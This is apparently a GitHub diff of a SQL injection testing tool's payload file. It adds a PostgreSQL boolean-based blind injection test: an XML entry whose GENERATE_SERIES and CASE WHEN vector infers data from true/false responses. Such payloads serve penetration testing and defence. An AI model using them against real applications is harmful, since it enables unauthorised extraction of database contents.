File tree Expand file tree Collapse file tree
Expand file tree Collapse file tree Original file line number Diff line number Diff line change @@ -671,6 +671,25 @@ Formats:
671671 </details >
672672 </test >
673673
674+ <test >
675+ <title >PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)</title >
676+ <stype >1</stype >
677+ <level >3</level >
678+ <risk >1</risk >
679+ <clause >1,2,3</clause >
680+ <where >3</where >
681+ <vector >(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector >
682+ <request >
683+ <payload >(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload >
684+ </request >
685+ <response >
686+ <comparison >(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)</comparison >
687+ </response >
688+ <details >
689+ <dbms >PostgreSQL</dbms >
690+ </details >
691+ </test >
692+
674693 <test >
675694 <title >Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title >
676695 <stype >1</stype >
You can’t perform that action at this time.
0 commit comments